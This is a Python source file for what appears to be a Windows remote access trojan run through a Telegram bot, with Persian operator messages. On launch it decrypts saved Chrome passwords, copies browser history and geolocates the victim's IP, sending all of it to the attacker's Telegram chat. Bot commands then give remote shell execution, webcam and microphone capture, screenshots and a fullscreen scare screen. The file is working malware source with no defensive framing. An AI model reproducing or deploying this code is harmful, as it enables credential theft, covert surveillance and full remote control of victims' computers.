"""import json
import shutil
import sqlite3
import win32crypt
from Crypto.Cipher import AES
from datetime import datetime, timedelta
import pyautogui
from time import sleep
import sounddevice as sd
import soundfile as sf
from telegram.ext import Application, MessageHandler, filters, ContextTypes
import re
import subprocess
from dotenv import load_dotenv
import winsound
from telegram.ext import ContextTypes
import threading
from PIL import Image, ImageTk
import tkinter as tk
import base64
import tempfile
import cv2
import requests
import os
from datetime import datetime
from assets import sound_data, image_data

load_dotenv()
BOT_TOKEN = os.getenv("BOT_TOKEN")
CHAT_ID = os.getenv("CHAT_ID")
is_recording = False
recording_thread = None


def capture_and_send_webcam():
    try:
        cam = cv2.VideoCapture(0)
        ret, frame = cam.read()
        cam.release()

        if not ret:
            return

        filename = os.path.join(get_app_folder(), f"webcam_{datetime.now().strftime('%Y%m%d_%H%M%S')}.jpg")
        cv2.imwrite(filename, frame)

        with open(filename, "rb") as f:
            requests.post(
                f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto",
                data={"chat_id": CHAT_ID},
                files={"photo": f}
            )

        os.remove(filename)

    except Exception as e:
        pass

async def handle_cam(update, context: ContextTypes.DEFAULT_TYPE):
    await update.message.reply_text("📸 در حال گرفتن تصویر از دوربین...")

    try:
        capture_and_send_webcam()
        await update.message.reply_text("✅ تصویر با موفقیت ارسال شد.")
    except Exception as e:
        await update.message.reply_text(f"❌ خطا در گرفتن تصویر: {e}")


def decode_to_file(data_b64, filename):
    path = os.path.join(tempfile.gettempdir(), filename)
    with open(path, "wb") as f:
        f.write(base64.b64decode(data_b64))
    return path

def show_jumpscare():
    try:
        sound_path = decode_to_file(sound_data, "scrm.wav")
        image_path = decode_to_file(image_data, "scare.jpg")

        root = tk.Tk()
        root.attributes('-fullscreen', True)
        root.configure(bg='black')
        root.attributes('-topmost', True)

        img = Image.open(image_path)
        screen_width = root.winfo_screenwidth()
        screen_height = root.winfo_screenheight()
        img = img.resize((screen_width, screen_height))
        tk_img = ImageTk.PhotoImage(img)

        label = tk.Label(root, image=tk_img)
        label.pack()

        def play_sound():
            winsound.PlaySound(sound_path, winsound.SND_FILENAME)

        root.after(100, play_sound)
        root.after(3000, root.destroy)
        root.mainloop()

    except Exception as e:
        print(f"🔥 خطا در جامپ‌اسکیر: {e}")

async def handle_dead(update, context: ContextTypes.DEFAULT_TYPE):
    threading.Thread(target=show_jumpscare, daemon=True).start()
    await update.message.reply_text("📢 پیام جامپ‌اسکیر در حال نمایش است...")

async def handle_cmd(update, context: ContextTypes.DEFAULT_TYPE):
    text = update.message.text

    if not text.lower().startswith("cmd "):
        await update.message.reply_text("❗فرمت صحیح: cmd دستور مورد نظر")
        return

    command = text[4:]

    try:
        result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, text=True, timeout=10)
        if len(result) > 4000:

            with open("cmd_output.txt", "w", encoding="utf-8") as f:
                f.write(result)
            with open("cmd_output.txt", "rb") as f:
                await update.message.reply_document(f, caption="📄 خروجی دستور CMD")
        else:
            await update.message.reply_text(f"📥 خروجی:\n\n{result}")
    except subprocess.CalledProcessError as e:
        await update.message.reply_text(f"❌ خطا:\n{e.output}")
    except Exception as e:
        await update.message.reply_text(f"❌ خطای سیستم:\n{str(e)}")

async def handle_help(update, context: ContextTypes.DEFAULT_TYPE):
    help_text = (
        "🤖 راهنمای دستورات ربات:\n\n"
        "🟢 ضبط صدا:\n"
        "  🔹 /record\n"
        "  شروع ضبط صدا از میکروفن\n\n"
        "  🔹 /stoprecording\n"
        "  توقف ضبط و ارسال فایل صوتی به تلگرام\n\n"
        "🖼 گرفتن اسکرین‌شات:\n"
        "  🔹 /screenshot\n"
        "  گرفتن اسکرین‌شات\n\n"
        "  🔹 screenshot [تعداد]\n"
        "  گرفتن تعداد مشخصی اسکرین‌شات\n"
        "  مثال: screenshot 10\n\n"
        "ℹ️ راهنما:\n"
        "  🔹 help یا /help\n"
        "  نمایش همین راهنما\n"
    )
    await update.message.reply_text(help_text)

def send_start_message():

    try:
        response = requests.get("https://ipinfo.io/json")
        data = response.json()

        message = f"""🌍 IP information:
            🔹 IP: {data.get("ip", "Null")}
            📍 Location : {data.get("city", "Null")}, {data.get("region", "Null")}, {data.get("country", "Null")}
            🛰 Coordinates: {data.get("loc", "Null")}
            🌐 ISP: {data.get("org", "Null")}
            """
        ipconfig = data.get("ip", "Null")
        start = f"Started from IP: {ipconfig}"
        requests.post(
            f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
            data={"chat_id": CHAT_ID, "text": start}
        )
        requests.post(
            f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
            data={"chat_id": CHAT_ID, "text": message}
        )

    except Exception as e:
        return

def send_file_to_telegram(file_path, caption=""):
    try:
        with open(file_path, "rb") as f:
            response = requests.post(
                f"https://api.telegram.org/bot{BOT_TOKEN}/sendDocument",
                data={"chat_id": CHAT_ID, "caption": caption},
                files={"document": f}
            )

    except Exception as e:
        return

def get_chrome_master_key():
    try:
        path = os.path.expanduser("~\\AppData\\Local\\Google\\Chrome\\User Data\\Local State")
        with open(path, "r", encoding="utf-8") as f:
            local_state = json.loads(f.read())
        encrypted_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
        return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
    except:
        return None

def decrypt_password(encrypted_password, master_key):
    try:
        if encrypted_password.startswith(b'v10'):
            iv = encrypted_password[3:15]
            payload = encrypted_password[15:]
            cipher = AES.new(master_key, AES.MODE_GCM, iv)
            return cipher.decrypt(payload)[:-16].decode()
        else:
            return win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1].decode()
    except:
        return

def save_passwords_to_txt():
    try:
        db_path = os.path.expanduser("~\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data")
        temp_path = os.path.join(get_app_folder(), "Loginvault_temp.db")
        shutil.copy2(db_path, temp_path)

        master_key = get_chrome_master_key()
        if not master_key:
            return

        conn = sqlite3.connect(temp_path)
        cursor = conn.cursor()
        cursor.execute("SELECT origin_url, username_value, password_value FROM logins")

        output_file = os.path.join(get_app_folder(), "password.txt")
        with open(output_file, "w", encoding="utf-8") as f:
            for url, username, encrypted_password in cursor.fetchall():
                decrypted = decrypt_password(encrypted_password, master_key)
                f.write(f"🌐 URL: {url}\n👤 User: {username}\n🔑 Pass: {decrypted}\n\n")

        cursor.close()
        conn.close()
        os.remove(temp_path)

        send_file_to_telegram(output_file, "🔐 Chrome Passwords")
    except Exception as e:
        return

def save_chrome_history_to_txt():
    try:
        history_path = os.path.expanduser("~\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History")
        temp_path = os.path.join(get_app_folder(), "chrome_history_temp.db")
        shutil.copy2(history_path, temp_path)

        conn = sqlite3.connect(temp_path)
        cursor = conn.cursor()
        cursor.execute("SELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 50")

        output_file = os.path.join(get_app_folder(), "history.txt")
        with open(output_file, "w", encoding="utf-8") as file:
            for url, title, visit_time in cursor.fetchall():
                visit_time = datetime(1601, 1, 1) + timedelta(microseconds=visit_time)
                file.write(f"[{visit_time}] {title} - {url}\n")

        cursor.close()
        conn.close()
        os.remove(temp_path)

        send_file_to_telegram(output_file, "📜 Chrome History")
    except Exception as e:
        return

def get_ip_location():
    try:
        response = requests.get("https://ipinfo.io/json")
        data = response.json()

        message = f"""🌍 IP information:
                    🔹 IP: {data.get("ip", "Null")}
                    📍 Location : {data.get("city", "Null")}, {data.get("region", "Null")}, {data.get("country", "Null")}
                    🛰 Coordinates: {data.get("loc", "Null")}
                    🌐 ISP: {data.get("org", "Null")}
                    """

        requests.post(
            f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
            data={"chat_id": CHAT_ID, "text": message}
        )
        help_text = (
            "🤖 راهنمای دستورات ربات:\n\n"
            "🟢 ضبط صدا:\n"
            "  🔹 /record\n"
            "  شروع ضبط صدا از میکروفن\n\n"
            "  🔹 /stoprecording\n"
            "  توقف ضبط و ارسال فایل صوتی به تلگرام\n\n"
            "🖼 گرفتن اسکرین‌شات:\n"
            "  🔹 /screenshot\n"
            "  گرفتن اسکرین‌شات\n\n"
            "  🔹 screenshot [تعداد]\n"
            "  گرفتن تعداد مشخصی اسکرین‌شات\n"
            "  مثال: screenshot 10\n\n"
            "ℹ️ راهنما:\n"
            "  🔹 help یا /help\n"
            "  نمایش همین راهنما\n"
        )
        requests.post(
            f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
            data={"chat_id": CHAT_ID, "text": help_text}
        )
    except Exception as e:
        return

def send_file_to_telegram(file_path, caption=""):
    try:
        with open(file_path, "rb") as f:
            requests.post(
                f"https://api.telegram.org/bot{BOT_TOKEN}/sendDocument",
                data={"chat_id": CHAT_ID, "caption": caption},
                files={"document": f}
            )
    except Exception as e:
        pass

def record_audio(filename="recorded.wav", samplerate=44100, channels=1):
    global is_recording
    output_path = os.path.join(get_app_folder(), filename)
    with sf.SoundFile(output_path, mode='w', samplerate=samplerate, channels=channels) as audio_file:
        def callback(indata, frames, time, status):
            audio_file.write(indata)
        with sd.InputStream(samplerate=samplerate, channels=channels, callback=callback):
            while is_recording:
                sd.sleep(100)

def screenshot_loop(n=1):
    try:
        response = requests.get("https://ipinfo.io/json")
        data = response.json()
        ipconfig = data.get("ip", "Null")
    except:
        ipconfig = "Unknown"

    for i in range(1, n + 1):
        try:
            filename = f"{i}.png"
            full_path = os.path.join(get_app_folder(), filename)
            screenshot = pyautogui.screenshot()
            screenshot.save(full_path)
            send_file_to_telegram(full_path, f"📸 Screenshot {i} from: {ipconfig}")
            os.remove(full_path)
            sleep(0.2)
        except Exception as e:
            pass

async def start_record(update, context: ContextTypes.DEFAULT_TYPE):
    global is_recording, recording_thread
    if is_recording:
        await update.message.reply_text("🔴 ضبط در حال انجام است.")
        return
    await update.message.reply_text("🎤 ضبط صدا شروع شد...")
    is_recording = True
    recording_thread = threading.Thread(target=record_audio, daemon=True)
    recording_thread.start()

async def stop_record(update, context: ContextTypes.DEFAULT_TYPE):
    global is_recording, recording_thread
    if not is_recording:
        await update.message.reply_text("🔘 ضبطی در حال انجام نیست.")
        return
    is_recording = False
    recording_thread.join(timeout=1.0)
    await update.message.reply_text("✅ ضبط متوقف شد. در حال ارسال فایل...")
    output_path = os.path.join(get_app_folder(), "recorded.wav")
    with open(output_path, "rb") as audio_file:
        await update.message.reply_audio(audio=audio_file)

async def handle_screenshot(update, context: ContextTypes.DEFAULT_TYPE):
    text = update.message.text
    match = re.search(r"screenshot\s+(\d+)", text, re.IGNORECASE)
    if match:
        num_screenshots = int(match.group(1))
    else:
        num_screenshots = 1
    await update.message.reply_text(f"🖼 شروع گرفتن {num_screenshots} اسکرین‌شات...")
    threading.Thread(target=screenshot_loop, args=(num_screenshots,), daemon=True).start()

def run_bot(bot_token):
    app = Application.builder().token(bot_token).build()
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^Record$"), start_record))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^Stoprecording$"), stop_record))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^Screenshot(\s+\d+)?$"), handle_screenshot))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^/Record$"), start_record))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^/Stoprecording$"), stop_record))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^/Screenshot(\s+\d+)?$"), handle_screenshot))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^Help$"), handle_help))
    app.add_handler(MessageHandler(filters.COMMAND & filters.Regex("(?i)^/Help$"), handle_help))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex(r"(?i)^cmd "), handle_cmd))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^Dead$"), handle_dead))
    app.add_handler(MessageHandler(filters.COMMAND & filters.Regex("(?i)^/Dead$"), handle_dead))
    app.add_handler(MessageHandler(filters.TEXT & filters.Regex("(?i)^Cam$"), handle_cam))
    app.add_handler(MessageHandler(filters.COMMAND & filters.Regex("(?i)^/Cam$"), handle_cam))
    app.run_polling()

def get_app_folder():
    base_dir = os.getenv("LOCALAPPDATA") or os.path.expanduser("~/.923463784tbe7211")
    app_folder = os.path.join(base_dir, "923463784tbe7211")
    if not os.path.exists(app_folder):
        os.makedirs(app_folder)

    return app_folder

def main():
    get_app_folder()
    while True:
        try:
            response = requests.get('https://www.google.com', timeout=5)
            if response.status_code == 200:
                break
        except requests.RequestException:
            sleep(1)

    send_start_message()
    save_passwords_to_txt()
    save_chrome_history_to_txt()
    get_ip_location()

if __name__ == "__main__":
    main()
    run_bot(BOT_TOKEN)
"""